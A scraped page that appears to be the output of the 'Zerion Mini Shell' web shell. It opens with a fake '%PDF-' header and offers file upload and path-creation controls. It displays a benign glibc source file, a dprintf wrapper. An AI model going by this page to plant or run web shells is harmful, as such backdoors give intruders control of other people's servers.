%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /glibc-2.29/sysdeps/ieee754/ldbl-opt/
Upload File :
Create Path :
Current File : //glibc-2.29/sysdeps/ieee754/ldbl-opt/nldbl-dprintf.c

#include "nldbl-compat.h"

attribute_hidden
int
dprintf (int d, const char *fmt, ...)
{
  va_list arg;
  int done;

  va_start (arg, fmt);
  done = __nldbl_vdprintf (d, fmt, arg);
  va_end (arg);

  return done;
}

Zerion Mini Shell 1.0